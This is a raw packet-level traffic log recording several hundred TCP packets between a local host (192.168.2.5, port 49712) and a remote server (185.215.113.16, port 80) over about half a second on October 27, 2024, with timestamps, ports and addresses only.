Oct 27, 2024 12:13:19.686017990 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.688540936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.688575029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.688611031 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.688649893 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.688694954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.688745022 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.688766003 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.688780069 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.689003944 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.698970079 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.725025892 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.725120068 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.725157022 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.725193024 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.725229979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.725327015 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.725327015 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.752270937 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.762176991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.762370110 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.762375116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.762412071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.762548923 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.763570070 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.763648033 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.763676882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.763744116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.763777971 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.763854027 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.763886929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.763916016 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.763943911 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.763993979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764061928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764096022 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764130116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764152050 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.764247894 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.764425039 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764472961 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764554024 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.764596939 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764626026 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764659882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764691114 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.764770031 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764803886 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764869928 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.764926910 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764961004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.764991999 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.765080929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765172958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765207052 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765233994 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.765239954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765273094 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765274048 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.765536070 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765587091 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765592098 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.765678883 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.765717983 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765749931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765784025 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.765815020 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.766071081 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766103983 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766134024 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.766136885 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766180992 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766201019 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.766215086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766247988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766264915 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.766282082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766463041 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.766660929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766786098 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766819954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766848087 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.766967058 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.766999960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.767033100 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.767062902 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.767131090 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.783751965 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.804392099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.804446936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.804490089 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.805535078 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.807174921 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.807290077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.807334900 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.807352066 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.807415962 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.807450056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.807485104 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.807676077 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.843648911 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.843692064 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.843728065 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.843763113 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.843803883 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.843838930 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.843976974 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.880847931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.880901098 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.880942106 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.880973101 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.881128073 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.882168055 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882242918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882278919 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882311106 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.882419109 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882455111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882622004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882657051 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882689953 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.882740974 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882792950 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882827044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882863998 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.882896900 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.883155107 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883377075 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883430004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883466005 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883501053 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883589983 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.883589983 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.883615017 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883651972 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.883666039 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883716106 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883749962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883781910 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.883786917 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.883811951 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.884149075 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884183884 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884217978 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.884218931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884253979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884287119 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.884289026 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884581089 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884614944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884649038 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884675980 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.884686947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884701967 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.884764910 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.885003090 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885054111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885087967 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885122061 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.885123014 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885155916 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885157108 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.885211945 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.885426998 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885502100 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885536909 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885571003 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885602951 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.885606050 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.885637045 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.885999918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.886034012 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.886066914 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.886069059 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.886217117 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.922966957 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.923019886 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.923059940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.923243999 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.925915003 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.925973892 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.925992012 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.926009893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.926089048 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.926153898 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.926188946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.926381111 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.962011099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.962064981 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.962095976 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.962169886 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.962193966 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.962291002 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.999588013 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.999675035 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.999732971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.999749899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.999782085 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.999787092 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.999855995 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.001295090 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001349926 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001363039 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.001468897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001503944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001626968 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.001688957 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001701117 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001737118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001768112 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.001802921 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.001832008 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001913071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001946926 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.001981020 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.002015114 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.002048969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.002072096 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.002150059 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.002471924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.002507925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.002652884 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.002718925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.002753019 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.002787113 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.002816916 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.003001928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003034115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003070116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003103018 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003108978 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.003139019 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003170013 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.003171921 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003204107 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.003206968 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003323078 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.003577948 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003627062 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003660917 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003712893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003746986 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.003746986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003782988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.003809929 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.004062891 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.004385948 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004422903 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004657030 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.004740000 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004750967 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004802942 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004837990 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.004842997 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004854918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004888058 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004916906 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.004923105 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004952908 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.004961014 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.004972935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.005007029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.005012035 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.005105972 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.005698919 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.005732059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.005763054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.006129026 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.041372061 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.041429043 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.041462898 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.041472912 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.041610003 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.044504881 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.044559002 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.044595003 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.044722080 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.044754028 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.044755936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.044877052 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.044893026 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.046375990 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.081300974 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.081351995 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.081413984 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.081448078 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.084152937 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.105920076 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.118159056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.118247986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.118285894 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.118321896 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.118360996 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.118380070 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.118491888 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.118520975 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.119016886 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.119663000 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.119698048 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.119734049 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.119771957 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.119777918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.119822025 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.119856119 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.119887114 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.120007038 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.120070934 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120104074 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120137930 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120167971 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.120351076 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120455980 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120491028 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120503902 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.120527029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120560884 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.120681047 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120716095 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120744944 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.120750904 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120784044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.120814085 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.121066093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121114016 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121169090 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.121206999 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121243954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121270895 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.121480942 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121515036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121551037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121551991 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.121583939 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121622086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121653080 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.121726990 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.121857882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.121984005 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.122018099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.122051954 CET	80	49712	185.215.113.16	192.168.2.5
